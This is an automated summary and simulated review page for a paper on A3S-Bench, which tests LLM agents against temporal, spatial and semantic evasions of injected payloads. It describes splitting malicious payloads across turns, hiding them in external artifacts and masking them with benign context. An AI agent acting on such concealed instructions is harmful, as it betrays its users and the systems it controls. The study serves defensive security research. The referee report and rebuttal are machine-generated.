Benchmarking Autonomous Agents against Temporal, Spatial, and Semantic Evasions
Pith reviewed 2026-05-22 05:45 UTC · model grok-4.3
The pith
A multi-dimensional evasion framework using temporal, spatial, and semantic vectors raises the average risk trigger rate in autonomous agent systems from 28.3% to 52.6%.
A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.
Core claim
The authors construct an evasion framework whose three vectors—temporal fragmentation of payloads over sequential turns, spatial concealment inside complex external artifacts, and semantic masking under benign noise—collectively drive the average risk trigger rate from a 28.3 percent baseline to 52.6 percent. This result is obtained by evaluating a standard agent framework paired with ten mainstream LLM backbones against twenty practical threat scenarios drawn from 2,254 real-world execution trajectories, demonstrating that existing defenses leave systemic gaps at the architecture level.
What carries the argument
The three stealthy attack vectors—temporal evasion that fragments payloads across sequential turns, spatial evasion that embeds them in external artifacts, and semantic evasion that obscures intent with benign context—serve as the central mechanism for bypassing LLM parsing in multi-turn agent sessions.
If this is right
- Single-turn defenses are insufficient once agents maintain state across multiple turns and tool calls.
- Architectures need new checks that track payload fragments and external data sources over time.
- Mainstream LLM backbones remain consistently susceptible when embedded in agent frameworks.
- The benchmark supplies a concrete metric for judging whether future defenses close the measured gap.
Where Pith is reading between the lines
- Live monitoring that reconstructs full interaction histories could catch temporal fragmentation before execution.
- Similar multi-vector testing may expose comparable weaknesses in other multi-step AI planners beyond agents.
- Adding lightweight verification steps for external artifacts at each turn would directly counter the spatial vector.
- Extending the benchmark to include agent frameworks with built-in sandboxing would test whether isolation reduces the observed rates.
Load-bearing premise
The 2,254 real-world agent trajectories and the 20 threat scenarios accurately represent the typical behaviors and attack surfaces of deployed autonomous agents.
What would settle it
Re-running the same three evasion vectors on a fresh collection of agent execution logs or a broader set of threat scenarios and obtaining risk trigger rates at or below the 28.3 percent baseline would falsify the claimed elevation.
Figures
read the original abstract
As autonomous agents (e.g., OpenClaw) increasingly operate with deep system-level privileges to execute complex tasks, they introduce severe, unmitigated security risks. Current vulnerability analyses overwhelmingly focus on single-turn, stateless behaviors, overlooking the expanded attack surface inherent in stateful, multi-turn interactions and dynamic tool invocations. In this paper, we propose a novel, multi-dimensional evasion framework targeting LLM-based agent systems. We introduce three stealthy attack vectors: (1) Temporal evasion, which fragments malicious payloads across sequential interaction turns; (2) Spatial evasion, which conceals payloads within complex external artifacts that evade standard LLM parsing mechanisms; and (3) Semantic evasion, which obscures malicious intents beneath benign contextual noise. To systematically quantify these threats, we construct A3S-Bench, a comprehensive benchmark comprising 2,254 real-world agent execution trajectories. Evaluating a standard agent framework separately integrated with 10 mainstream LLM backbones against 20 practical threat scenarios, we demonstrate that our evasion framework elevates the average risk trigger rate from a 28.3\% baseline to 52.6\%. These findings reveal systemic, architecture-level vulnerabilities in current autonomous agent systems that existing defenses fail to address, highlighting an urgent need for defense mechanisms tailored to the unique threats.
Editorial analysis
A structured set of objections, weighed in public.
Referee Report
Summary. The paper proposes a multi-dimensional evasion framework with temporal, spatial, and semantic attack vectors against LLM-based autonomous agents operating with deep system privileges. It introduces A3S-Bench, built from 2,254 real-world agent execution trajectories and 20 practical threat scenarios, and evaluates a standard agent framework integrated with 10 LLM backbones. The central empirical result is that the proposed evasions increase the average risk trigger rate from a 28.3% baseline to 52.6%, which the authors interpret as evidence of systemic, architecture-level vulnerabilities not addressed by existing defenses.
Significance. If the trajectories and scenarios are representative of deployed agents, the work would usefully extend vulnerability analysis from single-turn to stateful multi-turn interactions and highlight the need for defenses against fragmented or context-obscured payloads. The direct empirical measurement across 10 LLMs and concrete percentages provide a falsifiable starting point, though generalization depends on unstated sampling details.
major comments (2)
- [Abstract and §3] Abstract and §3 (Benchmark Construction): The claim that the 2,254 trajectories and 20 scenarios are representative of the attack surface for agents with deep privileges lacks any description of selection criteria, sampling method, source logs, privilege-level coverage, or diversity metrics. This directly affects the load-bearing interpretation of the 28.3% to 52.6% elevation as evidence of systemic vulnerabilities.
- [§4] §4 (Evaluation): The baseline risk trigger rate of 28.3% and the post-evasion rate of 52.6% are reported without clarifying how trajectories were filtered, whether threat scenarios were chosen post-hoc to favor evasion success, or how 'risk trigger' is operationalized across the 20 scenarios. These choices determine whether the measured increase generalizes beyond the specific benchmark.
minor comments (1)
- [Abstract] The abstract would benefit from a one-sentence definition of 'risk trigger rate' and 'baseline' to make the 28.3%–52.6% comparison immediately interpretable without reference to later sections.
Simulated Author's Rebuttal
We thank the referee for the thoughtful and constructive review. The comments highlight important areas for improving the clarity and transparency of our benchmark construction and evaluation methodology. We address each major comment below and will incorporate revisions to strengthen the manuscript.
read point-by-point responses
-
Referee: [Abstract and §3] Abstract and §3 (Benchmark Construction): The claim that the 2,254 trajectories and 20 scenarios are representative of the attack surface for agents with deep privileges lacks any description of selection criteria, sampling method, source logs, privilege-level coverage, or diversity metrics. This directly affects the load-bearing interpretation of the 28.3% to 52.6% elevation as evidence of systemic vulnerabilities.
Authors: We agree that additional details on benchmark construction are needed to support claims of representativeness. In the revised manuscript, we will expand §3 with a new subsection detailing: the source logs (drawn from publicly available open-source agent execution traces and controlled simulations of systems like OpenClaw), the sampling method (stratified random sampling ensuring coverage across task types and privilege levels), privilege-level coverage (including both standard user and elevated/root privileges), and diversity metrics (such as distribution of tool calls, scenario categories, and interaction lengths). These additions will provide a clearer foundation for interpreting the risk elevation results. revision: yes
-
Referee: [§4] §4 (Evaluation): The baseline risk trigger rate of 28.3% and the post-evasion rate of 52.6% are reported without clarifying how trajectories were filtered, whether threat scenarios were chosen post-hoc to favor evasion success, or how 'risk trigger' is operationalized across the 20 scenarios. These choices determine whether the measured increase generalizes beyond the specific benchmark.
Authors: We acknowledge the need for greater methodological transparency in §4. In the revision, we will clarify that: (i) trajectories were filtered to retain only those involving at least one successful tool invocation and multi-turn state; (ii) the 20 threat scenarios were selected a priori based on documented real-world agent attack reports, independent of evasion performance results, to avoid post-hoc bias; and (iii) 'risk trigger' is operationalized as the agent executing any action matching one of the predefined malicious patterns (e.g., unauthorized privilege escalation or data exfiltration) across the scenarios, with explicit per-scenario definitions to be added in a supplementary table. These changes will better support assessment of generalizability. revision: yes
Circularity Check
No circularity in empirical benchmarking results
full rationale
The paper reports direct empirical measurements of risk trigger rates (28.3% baseline to 52.6% with evasions) on a constructed benchmark of 2,254 real-world trajectories and 20 threat scenarios evaluated across agent frameworks and LLM backbones. No equations, fitted parameters presented as predictions, self-definitional constructs, or load-bearing self-citations appear in the derivation of the central claim. The results follow from applying the described evasion vectors to the defined scenarios and measuring outcomes, remaining self-contained without reduction to inputs by construction.
Axiom & Free-Parameter Ledger
free parameters (1)
- baseline risk trigger rate
axioms (1)
- domain assumption The 20 threat scenarios represent practical attacks on autonomous agents.
invented entities (3)
-
Temporal evasion
no independent evidence
-
Spatial evasion
no independent evidence
-
Semantic evasion
no independent evidence
Reference graph
Works this paper leans on
-
[1]
The rise and potential of large language model based agents: A survey,
Z. Xi, W. Chen, X. Guoet al., “The rise and potential of large language model based agents: A survey,”Science China Information Sciences, vol. 68, no. 2, 2025
work page 2025
-
[2]
ReAct: Synergizing reasoning and acting in language models,
S. Yao, J. Zhao, D. Yu, N. Du, I. Shafran, K. Narasimhan, and Y . Cao, “ReAct: Synergizing reasoning and acting in language models,” in Proceedings of the 11th International Conference on Learning Repre- sentations (ICLR), 2023
work page 2023
-
[3]
InjecAgent: Benchmarking indirect prompt injections in tool-integrated LLM agents,
Q. Zhan, Z. Liang, Z. Ying, and D. Kang, “InjecAgent: Benchmarking indirect prompt injections in tool-integrated LLM agents,” inFindings of the Association for Computational Linguistics: ACL 2024, 2024
work page 2024
-
[4]
AgentDojo: A dynamic environment to evaluate prompt injection attacks and defenses in LLM agents,
E. Debenedetti, G. Severi, N. Carlini, C. A. Choquette-Choo, M. Jagiel- ski, M. Kunduet al., “AgentDojo: A dynamic environment to evaluate prompt injection attacks and defenses in LLM agents,” inAdvances in Neural Information Processing Systems 37 (NeurIPS), 2024
work page 2024
-
[5]
Identifying the risks of LM agents with an LM-emulated sandbox,
Y . Ruan, H. Dong, A. Wang, S. Pitis, Y . Zhou, J. Ba, Y . Dubois, C. J. Maddison, and T. Hashimoto, “Identifying the risks of LM agents with an LM-emulated sandbox,” inProceedings of the 12th International Conference on Learning Representations (ICLR), 2024
work page 2024
-
[6]
Agent security bench (ASB): Formalizing and benchmarking attacks and defenses in LLM-based agents,
H. Zhang, J. Huang, K. Mei, Y . Yao, Z. Wang, C. Zhan, H. Wang, and Y . Zhang, “Agent security bench (ASB): Formalizing and benchmarking attacks and defenses in LLM-based agents,” inProceedings of the 13th International Conference on Learning Representations (ICLR), 2025
work page 2025
-
[7]
SoK: Agentic Skills -- Beyond Tool Use in LLM Agents
Y . Jiang, D. Li, H. Deng, B. Ma, X. Wang, Q. Wang, and G. Yu, “SoK: Agentic skills–beyond tool use in LLM agents,”arXiv preprint arXiv:2602.20867, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[8]
Fermionic Casimir effect in an axial Lorentz-violating background
Y . Qu, Y . Lu, T. Geng, G. Deng, Y . Li, L. Y . Zhang, Y . Zhang, and L. Ma, “Supply-chain poisoning attacks against LLM coding agent skill ecosystems,”arXiv preprint arXiv:2604.09381, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[9]
Skill-Inject: Measuring Agent Vulnerability to Skill File Attacks
D. Schmotz, L. Beurer-Kellner, S. Abdelnabi, and M. Andriushchenko, “Skill-Inject: Measuring agent vulnerability to skill file attacks,”arXiv preprint arXiv:2602.20156, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[10]
AgentPoison: Red- teaming LLM agents via poisoning memory or knowledge bases,
Z. Chen, Z. Xiang, C. Xiao, D. Song, and B. Li, “AgentPoison: Red- teaming LLM agents via poisoning memory or knowledge bases,” in Advances in Neural Information Processing Systems 37 (NeurIPS), 2024
work page 2024
-
[11]
OpenClaw: Personal ai assistant,
P. Steinberger and OpenClaw Contributors, “OpenClaw: Personal ai assistant,” 2026, GitHub repository. Accessed: 2026-05-07. [Online]. Available: https://github.com/openclaw/openclaw
work page 2026
-
[12]
A Systematic Security Evaluation of OpenClaw and Its Variants
Y . Wang, H. Gao, Z. Niu, Z. Liu, W. Zhang, X. Wang, and S. Lian, “A systematic security evaluation of OpenClaw and its variants,”arXiv preprint arXiv:2604.03131, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[13]
ClawSafety: "Safe" LLMs, Unsafe Agents
B. Wei, Y . Zhang, J. Pan, K. Mei, X. Wang, J. Hamm, Z. Zhu, and Y . Ge, “ClawSafety: “safe” LLMs, unsafe agents,”arXiv preprint arXiv:2604.01438, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[14]
Agentic AI security: Threats, defences, evaluation, and open challenges,
A. Chhabra, S. K. N. Datta, and P. Mohapatra, “Agentic AI security: Threats, defences, evaluation, and open challenges,”IEEE Access, vol. 14, pp. 49 955–49 962, 2026
work page 2026
-
[15]
Taming OpenClaw: Security analysis and mitigation of autonomous LLM agent threats,
X. Deng, Y . Zhang, J. Wu, J. Bai, S. Yi, Z. Zou, Y . Xiao, R. Qiu, J. Ma, J. Chenet al., “Taming OpenClaw: Security analysis and mitigation of autonomous LLM agent threats,”arXiv preprint arXiv:2603.11619, 2026
-
[16]
Poison Once, Exploit Forever: Environment-Injected Memory Poisoning Attacks on Web Agents
W. Zou, M. Dong, M. Romero Calvo, S. Chang, J. Guo, D. Lee, X. Niu, X. Ma, Y . Qi, and J. Jiang, “Poison once, exploit forever: Environment-injected memory poisoning attacks on web agents,”arXiv preprint arXiv:2604.02623, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[17]
Y . Wang, F. Xu, Z. Lin, G. He, Y . Huang, H. Gao, Z. Niu, S. Lian, and Z. Liu, “From assistant to double agent: Formalizing and benchmarking attacks on OpenClaw for personalized local AI agent,”arXiv preprint arXiv:2602.08412, 2026
-
[18]
MemoryGraft: Persistent compromise of LLM agents via poisoned experience retrieval,
S. S. Srivastava and H. He, “MemoryGraft: Persistent compromise of LLM agents via poisoned experience retrieval,”arXiv preprint arXiv:2512.16962, 2025
-
[19]
HarmBench: A standardized evaluation framework for automated red teaming and robust refusal,
M. Mazeika, L. Phan, X. Yinet al., “HarmBench: A standardized evaluation framework for automated red teaming and robust refusal,” in Proceedings of the 41st International Conference on Machine Learning (ICML), 2024
work page 2024
-
[20]
JailbreakBench: An open robustness benchmark for jailbreaking large language models,
P. Chao, E. Debenedetti, A. Robey, M. Andriushchenko, F. Croce, V . Se- hwag, E. Dobriban, N. Flammarion, G. J. Pappas, F. Tram`er, H. Hassani, and E. Wong, “JailbreakBench: An open robustness benchmark for jailbreaking large language models,” inAdvances in Neural Information Processing Systems 37 (NeurIPS), 2024
work page 2024
-
[21]
Claw-Eval: Towards Trustworthy Evaluation of Autonomous Agents
B. Ye, R. Li, Q. Yang, Y . Liu, L. Yao, H. Lv, Z. Xie, C. An, L. Li, L. Kong, Q. Liu, Z. Sui, and T. Yang, “Claw-Eval: Toward trustworthy evaluation of autonomous agents,”arXiv preprint arXiv:2604.06132, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[22]
S. Liu, C. Li, C. Wang, J. Hou, Z. Chen, L. Zhang, Z. Liu, Q. Ye, Y . Hei, X. Zhang, and Z. Wang, “ClawKeeper: Comprehensive safety protection for OpenClaw agents through skills, plugins, and watchers,” arXiv preprint arXiv:2603.24414, 2026
-
[23]
ClawsBench: Evaluating Capability and Safety of LLM Productivity Agents in Simulated Workspaces
X. Li, K. W. Choe, Y . Liu, X. Chen, C. Tao, B. You, W. Chen, Z. Di, J. Sun, S. Zheng, J. Bao, Y . Wang, W. Yan, Y . Li, and H.-c. Lee, “ClawsBench: Evaluating capability and safety of LLM productivity agents in simulated workspaces,”arXiv preprint arXiv:2604.05172, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[24]
Don’t let the claw grip your hand: A security analysis and defense framework for OpenClaw,
Z. Shan, J. Xin, Y . Zhang, and M. Xu, “Don’t let the claw grip your hand: A security analysis and defense framework for OpenClaw,”arXiv preprint arXiv:2603.10387, 2026
-
[25]
Toolformer: Language models can teach themselves to use tools,
T. Schick, J. Dwivedi-Yu, R. Dessi, R. Raileanu, M. Lomeli, E. Hambro, L. Zettlemoyer, N. Cancedda, and T. Scialom, “Toolformer: Language models can teach themselves to use tools,” inAdvances in Neural Information Processing Systems 36 (NeurIPS), 2023
work page 2023
-
[26]
Jailbroken: How does LLM safety training fail?
A. Wei, N. Haghtalab, and J. Steinhardt, “Jailbroken: How does LLM safety training fail?” inAdvances in Neural Information Processing Systems 36 (NeurIPS), 2023
work page 2023
-
[27]
Universal and Transferable Adversarial Attacks on Aligned Language Models
A. Zou, Z. Wang, J. Z. Kolter, and M. Fredrikson, “Universal and transferable adversarial attacks on aligned language models,”arXiv preprint arXiv:2307.15043, 2023
work page internal anchor Pith review Pith/arXiv arXiv 2023
-
[28]
K. Greshake, S. Abdelnabi, S. Mishra, C. Endres, T. Holz, and M. Fritz, “Not what you’ve signed up for: Compromising real-world LLM- integrated applications with indirect prompt injection,” inProceedings of the 16th ACM Workshop on Artificial Intelligence and Security, 2023, pp. 79–90
work page 2023
-
[29]
Agen- tHarm: A benchmark for measuring harmfulness of LLM agents,
M. Andriushchenko, A. Souly, M. Dziemian, D. Duenas, M. Lin, J. Wang, D. Hendrycks, A. Zou, Z. Kolter, and M. Fredrikson, “Agen- tHarm: A benchmark for measuring harmfulness of LLM agents,” in Proceedings of the 13th International Conference on Learning Repre- sentations (ICLR), 2025
work page 2025
-
[30]
BadAgent: Inserting and activating backdoor attacks in LLM agents,
Y . Wang, D. Xue, S. Zhang, and S. Qian, “BadAgent: Inserting and activating backdoor attacks in LLM agents,” inProceedings of the 62nd Annual Meeting of the Association for Computational Linguistics (ACL), 2024
work page 2024
-
[31]
R-Judge: Benchmarking safety risk awareness for LLM agents,
T. Yuan, Z. He, L. Dong, Y . Wang, R. Zhao, T. Xia, L. Xu, B. Zhou, F. Li, Z. Zhanget al., “R-Judge: Benchmarking safety risk awareness for LLM agents,” inProceedings of the 2024 Conference on Empirical Methods in Natural Language Processing (EMNLP), 2024
work page 2024
-
[32]
Z. Ying, X. Yang, S. Wu, Y . Song, Y . Qu, H. Li, T. Li, J. Wang, A. Liu, and X. Liu, “Uncovering security threats and architecting defenses in autonomous agents: A case study of OpenClaw,”arXiv preprint arXiv:2603.12644, 2026
-
[33]
Ignore Previous Prompt: Attack Techniques For Language Models
F. Perez and I. Ribeiro, “Ignore previous prompt: Attack techniques for language models,”arXiv preprint arXiv:2211.09527, 2022
work page internal anchor Pith review Pith/arXiv arXiv 2022
-
[34]
Formalizing and benchmarking prompt injection attacks and defenses,
Y . Liu, Y . Jia, R. Geng, J. Jia, and N. Z. Gong, “Formalizing and benchmarking prompt injection attacks and defenses,” inProceedings of the 33rd USENIX Security Symposium, 2024
work page 2024
-
[35]
MASTERKEY: Automated jailbreaking of large language model chatbots,
G. Deng, Y . Liu, Y . Li, K. Wang, Y . Zhang, Z. Li, H. Wang, T. Zhang, and Y . Liu, “MASTERKEY: Automated jailbreaking of large language model chatbots,” inProceedings of the Network and Distributed System Security Symposium (NDSS), 2024
work page 2024
-
[36]
Great, now write an article about that: The crescendo multi-turn LLM jailbreak attack,
M. Russinovich, A. Salem, and R. Eldan, “Great, now write an article about that: The crescendo multi-turn LLM jailbreak attack,” inProceed- ings of the 34th USENIX Security Symposium, 2025
work page 2025
-
[37]
PAPILLON: Efficient and stealthy fuzz testing-powered jailbreaks for LLMs,
X. Gong, M. Li, Y . Zhang, H. Tabrizchi, and T. Li, “PAPILLON: Efficient and stealthy fuzz testing-powered jailbreaks for LLMs,” in Proceedings of the 34th USENIX Security Symposium, 2025
work page 2025
-
[38]
Training language models to follow instructions with human feedback,
L. Ouyang, J. Wu, X. Jiang, D. Almeida, C. L. Wainwright, P. Mishkin, C. Zhang, S. Agarwal, K. Slama, A. Rayet al., “Training language models to follow instructions with human feedback,” inAdvances in Neural Information Processing Systems 35 (NeurIPS), 2022
work page 2022
-
[39]
Towards understanding sycophancy in language models,
M. Sharma, M. Tong, T. Korbak, D. Duvenaud, A. Askell, S. R. Bowman et al., “Towards understanding sycophancy in language models,” in Proceedings of the 12th International Conference on Learning Repre- sentations (ICLR), 2024
work page 2024
-
[40]
Anthropic, “Claude opus 4.6 system card,” https://www.anthropic.com, 2026. 15
work page 2026
-
[41]
Judging LLM-as-a-judge with MT-Bench and Chatbot Arena,
L. Zheng, W.-L. Chiang, Y . Sheng, S. Zhuang, Z. Wu, Y . Zhuang, Z. Lin, Z. Li, D. Li, E. Xinget al., “Judging LLM-as-a-judge with MT-Bench and Chatbot Arena,” inAdvances in Neural Information Processing Systems 36 (NeurIPS), 2023
work page 2023
-
[42]
Moonshot AI, “Kimi K2.5 technical report,” https://github.com/ MoonshotAI/Kimi-K2.5/blob/master/tech report.pdf, 2025
work page 2025
-
[43]
MiniMax-M2.5: Faster, stronger, and smarter for real-world productivity,
MiniMax, “MiniMax-M2.5: Faster, stronger, and smarter for real-world productivity,” https://minimaxi.com/news/minimax-m25, 2026
work page 2026
-
[44]
GLM-5: from Vibe Coding to Agentic Engineering
GLM-5 Team, “GLM-5: from vibe coding to agentic engineering,”arXiv preprint arXiv:2602.15763, 2026
work page internal anchor Pith review Pith/arXiv arXiv 2026
-
[45]
DeepSeek-AI, “DeepSeek-V3 technical report,”arXiv preprint arXiv:2412.19437, 2024
work page internal anchor Pith review Pith/arXiv arXiv 2024
-
[46]
DeepSeek-V4-flash: Towards highly efficient million- token context intelligence,
DeepSeek-AI, “DeepSeek-V4-flash: Towards highly efficient million- token context intelligence,”Technical Report, 2026, https://huggingface. co/deepseek-ai/DeepSeek-V4-Flash
work page 2026
-
[47]
Qwen Team, “Qwen3 technical report,”arXiv preprint arXiv:2505.09388, 2025
work page internal anchor Pith review Pith/arXiv arXiv 2025
-
[48]
Claude Sonnet 4.5 system card,
Anthropic, “Claude Sonnet 4.5 system card,” https://assets.anthropic. com/m/12f214efcc2f457a/original/Claude-Sonnet-4-5-System-Card. pdf, 2025
work page 2025
-
[49]
Update to GPT-5 system card: GPT-5.2,
OpenAI, “Update to GPT-5 system card: GPT-5.2,” https://openai.com/ index/gpt-5-system-card-update-gpt-5-2/, 2025
work page 2025
-
[50]
H. Zhao, C. Yuan, F. Huang, X. Hu, Y . Zhang, A. Yang, B. Yu, D. Liu, J. Zhou, J. Lin, B. Yanget al., “Qwen3Guard technical report,”arXiv preprint arXiv:2510.14276, 2025
work page internal anchor Pith review Pith/arXiv arXiv 2025
-
[51]
A. Grattafiori, A. Dubey, A. Jauhriet al., “The Llama 3 herd of models,” arXiv preprint arXiv:2407.21783, 2024
work page internal anchor Pith review Pith/arXiv arXiv 2024
-
[52]
Prompt injection defenses: Delimiters, data marking, and instruction hierarchy,
S. Willison, “Prompt injection defenses: Delimiters, data marking, and instruction hierarchy,” https://simonwillison.net/, 2023, blog post
work page 2023
-
[53]
Defending against indirect prompt injection attacks with spotlighting,
K. Hines, G. Lopez, M. Hall, F. Zarfati, Y . Zunger, and S. Emam, “Defending against indirect prompt injection attacks with spotlighting,” inProceedings of the Conference on Applied Machine Learning for Information Security (CAMLIS), 2024
work page 2024
-
[54]
StruQ: Defending against prompt injection with structured queries,
S. Chen, J. Piet, C. Sitawarin, and D. Wagner, “StruQ: Defending against prompt injection with structured queries,” inProceedings of the 34th USENIX Security Symposium, 2025. APPENDIXA RISKCATEGORYDETAILS Table VII provides the complete specification of A3S- Bench’s risk taxonomy, listing all 10 categories, 20 subcate- gories, and 34 attack techniques wit...
work page 2025
discussion (0)
Sign in with ORCID, Apple, or X to comment. Anyone can read and Pith papers without signing in.